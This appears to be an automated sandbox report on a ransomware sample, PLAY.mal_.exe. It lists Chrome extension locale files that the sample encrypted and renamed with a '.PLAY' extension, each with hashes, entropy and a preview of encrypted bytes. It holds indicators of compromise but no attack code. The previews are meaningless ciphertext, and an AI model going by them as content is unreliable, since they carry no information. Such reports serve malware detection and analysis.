        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\iw\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3304
        Entropy (8bit):7.932426397251443
        Encrypted:false
        SSDEEP:
        MD5:C41A9F0CD99241710B3E3BDC28118CB0
        SHA1:A0315DBDCE7A31E7E834A6CAC39248DBC6CA4390
        SHA-256:F368A7BDB2175D9225A1EF19EA39F6FA0DE5DCB4D27FA2A52F52DE74187B1E54
        SHA-512:7CA978692DEDFE7B19435575B9DFDA039F4F7A58AF8377FAB7A8E10F3B6F56C3FAC044DA729510E9635E6333938AE171204A585BEB49C80BAEABEA23482BEA04
        Malicious:false
        Preview:..QsM.....O.....)J.>b.....bl..]Qau.$.`...I.+.<4#...<..wC...@.....R...K.Z-.4........W..t.e.^.../.....g=&..w.q.W.'n....we.y.b......b...PY...TU....'3.H..[..u.3D.a..5.:....E.~....cK..=..A.8.........\.vn..5....}W.-d.R.L.*...WU..n...C..5.....d.5.........p.|...,Y.......4....Z.u...[.D.!N..a..#t...C.qEi.z.....&n..."....y.....f....:...I..!.......H*6.R..m.Y.f(...i5...I..4A..C.....:9oC..,(|[d7g.....]>s<y.r.8.....f....-.C...6#...s...u.2.D.t...#..I...... ......t3.ODwq.Q.:..../`..2..}........c/nF.....r9@..4.S...n.ZM.6...\~1k).\._@q........#...+..$b....mac:8.r.[yp.}a...6T..d...l.a.1jS......}Q....#".1`.*vw..L.<.?|<.I..L0i<......3.&.9,g...*.t.~.~..um....0...b1.>Um/...t"...]m<....S..L.}Us."......%...d.p...C.H..4B4$.t..~-.e.g....q..nY..X...VA..E.l....U.I.3 ....s.|.Rc.4.s...D.....N*D..\6;......8P,&....$v.O.K...k.r.Ll..9=....../z.....#N..\k|J.."..'fD).5.bK.J.h.YF........7..I....}....P..9..K..>....^..w.".....AO...-..z..tc..cD.....8.....[..&V...#...bd...q+...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ja\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2232
        Entropy (8bit):7.905948660279689
        Encrypted:false
        SSDEEP:
        MD5:BF35DEE366DAE8D739E224131555AE78
        SHA1:E8AB0D917F34C20CA1B979A7C9DEC687C0B653CF
        SHA-256:25601F8E690DF85BFBD3776CD1BB367ADD9B7C42F5E14BFDA1B1231DE5AB9FE5
        SHA-512:23B8EAB04BECE31368E9674BB21C812DB8942D6E9B2B02DDB07A00A0C68B8960F0CB03033DC4CFB69A5FBDC6727E67CF0BCD0E9B82474D04BD8BF557AC69CD40
        Malicious:false
        Preview:...+&u....ZE.$.SN}......3.>a.@....(..y..1yq$.2C..p[c...U.B..{....*...*.<k.<i.r..g0....e..0...v.U..y.o..&^..x.s..yK..J#.....-.7...h/.K.............9...p...M.f4.]Q$t..........~.*.=.Z74..\....6!...fP*....i"....!.'...<.....V..'.... ~..q.ElGR.D...X..............u...,.........h.Vn8.I..9v._..$..)u.._.Lob.1t1..|..J*<#..Uv.Q..@".X.h.....wu.[.s...y...u..V.....*......EA..K..[...6#x-.}.V...:.ta...u.........fh..u...k+....n.j...#....`...J.....:$.o.e"#..%........0..c).*{3eL6........C`..5....".D..^W....#w..b...dv.)]'....k.X.\/]..K..V2A....E.m.j~h....[..@g..d..E_..%..K.PL.1.~.........G<.'..d...s.qx..>......6..`s..eO....G...9......'..5...6.`f.i.2....f...[.U...i8xj..@..U...+v.)f...S..w....!..0P.U....W..m+u.nO.l...`.6..XL0P..N.......U....V/..=g3$&...F.^`9./My_p.............9..,.28|f..v...B1..+.g-?..g....,.n...C..iP...b8.T].B_>n...Z.*..pG.K...(.xZ..l...0.F..R.bc".G.&....J.....6.....m.Z..+_......Mb/....VT...@F.x...i....01'C...w.*...m.....B..x.&.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kk\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4312
        Entropy (8bit):7.954856714480404
        Encrypted:false
        SSDEEP:
        MD5:D68DCD136FC4B1F8783402CC4BA4F8B7
        SHA1:7FC0EC24379798850BBE67B24E76CF50D604D65E
        SHA-256:A7115FF2217EBBDE9782C99F01D409672EE0484AF4B9222CE57E8C5DA40327F5
        SHA-512:B166A999EEC9AF55BC4ED56635476F409646E277D2A0D78393DD325777F60036A8D936C098D66EE6E19789AA42CD6CAE4C60AB70463B28B5B056473C9B6E8E32
        Malicious:false
        Preview:#.?|.%b...%.?.,.....[.K.+..bRs....%.DF8.Y.].6p.o)D0>j.h....:_..n....?.K.......FL...O.E.`..f.pO.bh.!."...o".....r...u.m.....3.]D."..|....N....(....d...*....t..Hi..B.&.0.;:...nZ.j......6...`....m..G.....G..j.X.......l........3....q..A..k..5x..2oEgmy...,h....3..#qB..%......X..s%fG.`..... H.Q/........#..b.P(<..7...W...^.........J....1.....v..M...d.;.,GZ..y..gPe.7s...;X..(M..pY....f.P..p...lT.,dqOh.\...hs5..u..ukH......f_.Q<n.....L...A.I..mH....T.zi..PgQa.(./.'..3.....y`......`........g.,..K...}...d.O..)... ..L......g.x.Bgc*8...|.....b&......f^.y....ks7...}.T...fP....#C...$...&..q3B.V/a.....SG.......h.9..$.2...^..j.aT.$..;h.x7C6GN..W3.`....Na~.z..u...1G....q........|..c3...d.J.yz9u......y..jfZ3....>*...s....m.i.L..i.Qr.v............o........./r{..O+......Wtw.>!.])...;..I.w.P..Ph.@>Y.{.......~....5....V.u.......(....-.1...de.[.^...8.mp....G_...5F..q..........+..~...Z..V....5..;&z..B...*6........p...8sM..h.%l.k.."u^"....u|Y..D.......6]Ot..U.._!...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\km\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4200
        Entropy (8bit):7.952603606719502
        Encrypted:false
        SSDEEP:
        MD5:4028BE6836A573A3C7EA69B83310DEB4
        SHA1:E1E622A75C2AE0BA8BD12BBA4FF3E86B6287C007
        SHA-256:3FB7F59764709C00BC792A4EB1FC737E0291A72DBB43D157E645B39E8BB54B96
        SHA-512:807D6B51D11F92B0154CC13B652144793C9F2F0845B7D53784B7CB35720CC1AB42BE2B31D9E3CD00B71A78D414F62A6BCB4DAAF94D50F6D0A29CEB1F77CAE2BF
        Malicious:false
        Preview:O..H.....v.#../.).fL....K]Q..;!.#.R..)N....4 ..%8e..%%.?...G.sN.5.T..B..cq..w.Y.......].=Tu..&.....1.....~.i...Q.......W........p.'....nu...%.e?.f.."...]"...../f....%...B.z.....McZ..t..C2..$_h.J..@J...:.t..18...o.b..M..c..Y..].T.9R..Y....N.E....]&d...f(....*...[.n...A.2.q......s.].G2Y..8.H.O.W.;j..._...f*..s%6...`..dax..^o..d-....9...._..Y.r.2..93..;np......S..s.4Bx.cn+..Myx.V.S\;....^..!.r.... ..7m.t.......I<.~oL.......=.A.#zU%!5..;....~...t.T^+.u)..y@j...R.......E.p.!..f#......U.|*B.Q.E>."..>.X1.4.\$.L/...r....h...m..._.b....E.e.-5f....#6.Z._bd|.ll....K.......U...z.2..H...j|S.q.Z=..9...S..^Uc...:.t..."Fp.k...{iw}...Q....U..@P..'...ZM... _i.<x._.w.......g..'l.0.).F..H...].S'.h..9K]...|;e..^.m..C.H...]t........y.y<o.....@f.$E.E.kB..r..|.....E9o.......?.i...... ...e.I..m.l.T.v...(i..9..(..Jz...I...r..j.?.....^.u.%'.z..HJY$..~...3 .wv.L.3..0.6...{....>Z'..i_...2F?0R...5.t^..N.6l~.>.../+....J..s..4.p...l..34..d....../t.zQ......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kn\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2952
        Entropy (8bit):7.938491002420368
        Encrypted:false
        SSDEEP:
        MD5:6830F16C96EDABF0F71A9C0D581CDFD0
        SHA1:5C50BAD36FDACFA18EDC3987F813D8156333FB0D
        SHA-256:9EF47859FBBF9A2E85734E2AF2A784813283FFC23194B2C4FDEF59184F4FD708
        SHA-512:4D46D0A5A3525B63C0582F8DC5B67A18C65C9E2828BD4B18602DEE9B24F15F5715020B2ABACB4FC7EF174E79BC229937E8E3080F7463B9E1DC637B09F3F9E192
        Malicious:false
        Preview:._.8......4..~....f.q.'....9..N.)..5`....;D^)G7....H....]L.D.x.C..q.bF..x...q.....-.u.P:.../5....V'z.~!P.5.&UdH...:.{...Z..n7.xi4%...*.7(=#.........e.#;.E.w......6..4".y.N...^}..M...g..a..e.e...0. .=.au....@.@R..L.l.p...Y....B!.EH_.....'..9iCW5...I..nF/......K9.w....:.....@......0l.s......C....)......V`.D.`/..o. ....Y............Z..X.Qs...........%\.l...m.yQ*6:.u|..d.b.|>...c.q.K.....XF.8F...G....v..'.~*>..>.@...3[.....=......E,.....0..jU.Un$h.O.I[..}..?..hX.J...-.d.B.MLe.y.,...X.HH5c......x1.B..#g._a...?..Q4..`.R.|.~*f........x*....;5W....h...f.~.....3......&P...G..g.X..=...)9.....+.,.t..H.....R.1H.|/$.........9.QJg."^.....V.K..b.....0...'F`...D<i..."....{y.d.q.=.t\,...W..$...0...D......w........a.XSS..BCr..0....Ne.M.....J.~.".M?q..o....s..1....<.-...6%'..........5..%.......d.R...Ql..v.n.QT..z......(.)f.>.h.o..u..4..{|..S.].u.3p.....Ms...z..&......X)Gi.y6 ,N.Hj.P..,..%.6..+......t...h.^..e.i.3..9..SL.~R/ .H..5.v.....6'...-.K).e5..o.w...M.r.N

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ko\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2120
        Entropy (8bit):7.876707119840989
        Encrypted:false
        SSDEEP:
        MD5:A3402C343F74CC1CBC631134F464256D
        SHA1:1BC3CAD8D04B091447C4E57515F9D2630B789411
        SHA-256:F6D1C87457917C192B9E5ED0ABFF5387E00C665D506C36C88DC60F1FD1DA3558
        SHA-512:B184165E2352F16EC60CCCFBE0C8709C6F2266F32B9E41746F61AE0A5FE8FC46CD146D1E4851CEF448F90F593B1E56E557CD2CDF7CC13B5AB059232524ADD964
        Malicious:false
        Preview:$*.D..n.S:..s........r,Y`.SP|...U.+....9.P..b...mS.g..A.....RvB....J..Q.w.Z.(..W..o.y..;....Z..u..f..1..}..4.Q..[...,..!.b.g.}...";.....W..hC.~.P...U..+u.k.....f.Y.5<...3...$j.67.......&..\..p....AL.O .#........7.4..6......<...F.o.-.....;..e.(fg....6. .X_e.Ri.U#&.....4U..:.R.H$.w.GW..]./...Rzk..|.8c.j...+U9.........a:M)c>m.(U./0...I...l~...`:..DZ...{....t.b..."u$....9...^.Z..`o....e...|...*NXTp.Z..N=.....-...'a.^......E..Fy.,..S^)\.X..|.E.....*.....5...}<.~.pnt:Q>.`c.....#.:..).J...7.4.k..I.i:.;{.,t...i..2.D:.7..$.....c+..*.uN....t!.C.E...xi.%.7.vznWk.k........(.;..0...9.{..Z...KxJs4.rJ..;..L.\.XbLqzaja.8.q}...{...{.....$....9.E.m.h.]T...H.S.}.s.....Q....x.D.....C#u......Q.{S....gD.M......._.....t....j....)..0.a.6.}X...s35.s9.H..&....-B) ...~=.h'S9S.!0D.mE5w..2.6..w).*....T......)...0.../]g....rs.~7. ..`.l...H.Q.S.H.1.N..E...j.#.....R..hn.V..M....'1m.&..hl..Q.,.....>.K.C<....v.p...o.%..Xt.-](.5.<..g..7.BS'...D.b.........?Ku.o].jN:y.axN...t

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lt\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2104
        Entropy (8bit):7.916025845898411
        Encrypted:false
        SSDEEP:
        MD5:5B768613226B8ACACA322B64175FF1A7
        SHA1:025DFB3F26DBF2453E0658AA62A587B5C752CB09
        SHA-256:682EB4FA2EF9D306F2F19830208C303B19CA107A8D86135D186A220CDB83A306
        SHA-512:88FA7756EEAE36464E15BD5647F0B20A80F98AF3CB0E9AB2185C51E45DC8E566DC49E6F19DD9857F24A174789B2B8319E668FD2FE32E6BBC11BB099F25D6CE3C
        Malicious:false
        Preview:..D..R.M.g...;7..C.^.L$.......9.x.....r.EA.[{.Y7.j.{..nD.-".n.oh..i.K..O....a3.....C.4|...4.Q].s.H..F...%p...*9..A.....I.&.`..a1.../.....C..L.....2..R....7\N....l.9..a` >....p.A.+..8.H....4W}:..Vs.... i..."...Y.G.h......*..c.&.......BL./\.{H...IC%....Z..m.3?y....9.C....A...i6.$<.....x..c[g.xo...a..f .~wG......^4....1r#....u....3......97...Ua8....?.s.$.}Q....}......VPn...S.2..?_yXL..7`....l..qH[R..?..Z_j._.1w.....ESy~.F..3V..W[..[.\*.l.....MAro.T..Z=..^+.V..O..1.&w.Ik.....,/.j^..,4Z...z..>.&r3.qU...Qn.y!..o.....&2.S..)Z........c...{.c..2...+./..2.*.P...!bF....).;U.Td.1j.....p]..,.,r."1Y..t....(..i |R..9...EfV....j...C.=C`.Q.r.....XSY..&.S0~.o.qK..tZ......-.....D..x..e........E..v.#.... ......{D.;%......C.~..v...;......u...Sj...t=v(o"...p..\..)dx.y...a.Fsg.5.I.`.A.....DZ......Tn^.../....#...*@`on`M....a"..{.Ym.O#JR|..:('......6.....;.s ..|..Vc;:7......}<m..0.~..%...iR|S..6..1Nb...Q.t....G...X.7........cb......_....@.I_.p+. ....6.u..g...?

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lv\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2072
        Entropy (8bit):7.892422256302915
        Encrypted:false
        SSDEEP:
        MD5:452F28ADCE412185ED8753DE2C74D4CE
        SHA1:92922EE14068EB0406983D88090E0A988F4ECA40
        SHA-256:11FEC385AC6C2F99F56747B21A5C424687A6023A0DE79A9D3C4FA625EF89753E
        SHA-512:0FCA1CB2DD057111D9C1352C382BE6B80E80B00004D967CF3C5D54956DE82E7269D1891859EE1F2489629B02143270E55AE3D30520B49D26C7C7A0F4B37242AE
        Malicious:false
        Preview:}.y.......J..n.*5.!"V.......$Y.[...Q...|$p.*..oG..Nu9........1+#0.O{1....hS.1zr...:..{.......O)BJ;0.*.."..N.X"`Z4.{.,[.!/..[4._..].q..]{%...r..A.?.SCV.^...........y...,..._L...L.c.,c.!.c.}.a....|......C.....n;....G.K...Z.z.dH........ .....pi5......m$.X.o.8.#0.s.n.....M.......Zj...?...Y..>..f.b...a04...I..$.....FWV...o2....9..;.<.......4.7T..;......x..{..w...5.<.n-.^..n..`._..#...Aem...u._@...../C...kId..."..?;..pp..w......ojb...w.yu..1....x.U.iDh..2.....$...... .`h....8....7..o.$qW.f.Y%z..bX....a.S.&.<wQ...]..9...........G........r/:...|..O\.......7...dM9.f.>R.. "Qw..~U.....(K=..........Um.ok.....^.53...Bb(.>.&...*?.]P5........^.D.L...M..I..$}...r...7J.q{.9.K{@._..f.i..U.S.$...O.....x&.#xd..|sF....z......j$n.:...*/.A,V.}.9rDa&'...nm..*.K...5S.F...Z`B....K].@.c@.....s...6z......*.{...j.Pn..x~....f.L........>V.a..;UZ8:.q..vTc.kr{UG.GTe1....Kr....o^t..,.J.@.bx.<.[...*...R8...@W..X._"......./N.r..v....JB^T...=..,\Z..5..O..h..T9....H

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mr\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2808
        Entropy (8bit):7.924102756491325
        Encrypted:false
        SSDEEP:
        MD5:4EA616F8150D99E80BB06463BC607FE8
        SHA1:D294C73402B3EEC0B5E47C541F6C22B8CE28F037
        SHA-256:58BDB61C3BCFFF56C26FC2D620204D18C26365165FE83325D94FA98B44C6BF4B
        SHA-512:229FB3B5F85EE201153498CFEB389A6A392B6F8D8802A84B915DA326DA3FA439C0802DA5DDFC6369AB140F90CEA29F4E2C4AB841362A835BA98D6B7DC78A889E
        Malicious:false
        Preview:.x.?..]..l.o....a.Md?_&.;#......J."K....$.F..[1H.ip.....`...z..VO......Mw.....hBI...+CJ".....|...h-g.`y..m/..F).._]7.U./.4.].1.;@....'......_..a..6.h.R..Ft."..bz.b...|b_.....J.0.....h:..av.|.J;P.G.....#..)6*.X..9 1........!.'.6.dqA.ZR....1..W.8.c.].1=......H....@.[^~:.T.0o.....z..*.~n.@.1..v..U...}...JE.=....|....jn.:.#.....h..2..P(.Y.>?.5.*.E}.z..Eu.nc..>..Z.G.<......5.......(...g.4..(P.......p...}v....:..7n=J6s.ha..{..`FS..~^.973{j.....cTzL....m..M.a..k..Ve.~.u.?..(..?.L...........5.7..<XD.A.....5......oY''..}.*.H..a.RQ.8...J.e".w..,.pS3.$.7......<,..X,@v... ..4C.o.F.yQm{.Z.'..~.T........6..2K.4r.8.mm3.....d.Gp...r9.:.zl.L..8h.|.4...I+n&.IQ....V.>U..h.....'......"^......^.e*...w..#.n'9.0.......{L\.:.-....x..p.........-.....h/a..9.....J..$.O+e.........FK......B.:*7...Lz.e..a..p.@>?...s.N....._q.K.*.gM....=.n..]..'.i1.>7M.P...(..}......r.S.~Sc......LF.w...=2....DA.-.g1..w.G.m... .^|J#L.......>...C"..w.)y .#..O.n....l.w.-...A....s..7..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\my\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4904
        Entropy (8bit):7.962490349076083
        Encrypted:false
        SSDEEP:
        MD5:659D3FD8E060A0D3BBAB5768A49EFAC9
        SHA1:033FD7BCC86A5A080C64F8EBA6CA332E26B6C3DD
        SHA-256:7DE705C75EB2E8EA2E3BBC2CEE3016D0ECBE098EDB70AFA97A2C138AEE65B143
        SHA-512:7FED9DD5742FA2E9611B25E030641ABA03FA1C460E4B4E125FA88521D57E94851910BBA8E8E6E59317D47AB54625D287E12A1F11F88FB8A69C2722710E59D7E8
        Malicious:false
        Preview:+..u.....@X.I......:`.=.).-D". f..N.z.r.5[.(.Fv...e.<us.X....J......=.4.H.O^M....>&V(F.?3D.$.z.l...6....P?z..g...........3X...h.K.....O.+$..U..K.....\..K{..jt.._9.......{....?...F.F.l.>.]Hg?. ....D..7..;.=.p.<.1..H.....E3t@Y877...Tw(7f....].4K.....c8.^..#.@'.._.A%.D...(|[.......*..o.DVY.\"b].@.Q..:.!..)....j....5*...P..C..q..+.~.j..1.J._......d.].I|OS........|.}....V...........N)5.w.Or._.3w..y..3G..t1.g..9..O.zi...$........".-u.7...Q...p.N..Giv.y...yO....|..M...#...<?....<....N[.r#T.m..>..]tV.X.\..M.....F.!je...Ab...(.o.RkuX.NF:z.! N.1..X-.B....@JG^..c 1E.f@....CM.0b..G....t...;..j.p.ob.|.....y...x5n..-.....B......Er1..*.<?.T....z.^.1..U)0F.k./.q.NoQ>\d..KS...._|..V.Mj.....'P/K\.Il....a..s...&._.M.}.$.Y.......G.L.......:...p.8...0.=....S..~."o...Z4..8Bcy.<g....?.n..fn.3..y/N.SU....*$.'..V8.h....X..].@I..N|.wmM9..@.O2...X>=...].D....(E9.s...ZL.53%.K.."......k......a..,..z..P3R...%..#.`y...=.U2..0......|.7,:A..$.0X.X&..!3../.\.7s.'/

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ne\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4296
        Entropy (8bit):7.956304202032105
        Encrypted:false
        SSDEEP:
        MD5:DB2F60350FE49CB1AB94623641156353
        SHA1:72EFD7A0D3921D9E88E5203A3AD80D6DDF70C714
        SHA-256:0689CDCA5CD823485A4FB4200F1DD40145ACD7069C134A3E43A51DE934FDACCA
        SHA-512:258393959B9DE2623C6F18C2B1BD1DFE73D70609C68567AA68A28959F69046902824332A7717A69976F46C09EF3F90E1CA67F6D99069C95B3A2352C090805928
        Malicious:false
        Preview:..<.......+....`Axb.D.....N.9...@.....":t...N....iss....D3.SG..C..D1}...L'F..c..z..]...F.....]...K.!em...@1.6..i...4..C6A.^.%..f..r.V.~z .q...0..].{.......`<E.:o<;R...N.!-..?..P..R.m)*l.;. ..'....'H..^.|..r.....}....>.S......H.....&.{...q.:5*i.%*h.;.+...F.@.T.>.d8.[...9.#=.,.I......g/......"....}4.s...,..:...G..JK$Y(.q..@.\?!N...F....Rdo.Mo.&w../P^.y..Xf9..V.."}\.I.+..B...8.^.w.K..|.m...q..../MD.w....9Y....@.t.....^bw.S..4.e.Z>j...........D.Nll.E;a.2..M...G..IC.u. .....g./.YU.G..Ta.....J....y2tnx.....$~1B.......(@~...G...hd..mA.2..%n..O.1.p....T..k......Z#..:...}...3.W]....Wv....4*A.R. huMV.C...M.[...#.5....c....|..e.Q:...l..3..m.J.=..^wF.`.....aM.........n..t.#....|.AZ....T....2...E#W%.......l....]'.pa.....c.1<p..=._...p}.ql........:......N.N..~..(DR./.+.....@...*..\X..u...xrr....M#.'j..S..s.c..,....Z.. K.M:z......M...!j..._.<..........4.LF._...|......M.G...>....U........e@i+..L......C.|.$6u>u.*p..M.8........D.M...nG.j.o..B....$.....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\nl\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.896584550606547
        Encrypted:false
        SSDEEP:
        MD5:F9F41B1174FF37BC29DAF44CF4F2868F
        SHA1:D6EE77F79B9B4BF11D7AF8D6B66DFDE1298525EF
        SHA-256:9CE75D5EECD633039B6C2CCA2FADB86CE0C3EE9CA0558578676E43A75BB9577B
        SHA-512:C9AA717470ACB2217B2E3C16A3C6A13FC359A57CE599D3344A1F163EB877E5AD8C52B81298433197ACF02DDEC02D5A67316D8168312EAA73AEBC727907435FBC
        Malicious:false
        Preview:..p6^Uv.V.S5(.(e.z....;.hq..l......{..J..p...A..I.?.....-./.Sl.;.M..U.b.~.YN...4.>.*..s}...#.*...Nn.L.f..owF+18...[w.."T....>..h.......q..*vA.R....c(T)E....Z....{B>/[a.q.hN..3"..M(......c.}..0.>w.3....L..'3NA..KhKdB....z[....1y.f}...S}.N...7...jL.B@..O...... .'E...P0#U.y4.."]5..kM0R.X:H....k.:I\W...%P>.k$2...9.E.V..fr;.F.#4.....U....)j..5.6......HQ..&.).4..'..nA.6)1...l.mW...m`[r....).......6.s....EW..l=...~..[.+'..0....c......O..!x...O.G .!J....~...|(...U......w........BN.|...3....=.r.I.......w.....g_..d.6.&l.l.B.M.pM...6m..c.S...ZC..F......t{B.J......Y..N.T.ErJ6.w.....$a....... .B.M.......)..r......bz...Z....,..:>.lg."X.0....-.h.B#.....Eu..$S...n. ....@...`.+.hU..2..fo..i>.r..|GxO.n........n".3N..c....X.........b..^.....;.p..-...P."...~.e.."._......=1.*.<..-....D..y.(_Z@.[.........[...".]....p.....S....i..$r..2TZ)G.|./Q.32.....g..Vt4.~.._+..p%.+...t...]K,.T....4./.......m.).b#..T..U.|.!.I>..........................g... w..#.x........1.o../...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\no\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1832
        Entropy (8bit):7.862844008052338
        Encrypted:false
        SSDEEP:
        MD5:F762EFFD9BE974ECE4FC4A6C3A752F0F
        SHA1:696A60E36EAE7C6B9FB727E522F4F9B1C85DAD16
        SHA-256:13163DBE6FD425564926525403B34D89A4ABD5C6B72C876DFAA7970441584920
        SHA-512:328103EC1A833B0F5D9775A931320657B55092A46E9D7EA4B8DF68CCD2FCE7664A68ED73A5ED78864507109098BD25FA12CD00903406D4D716F3116A6AD21724
        Malicious:false
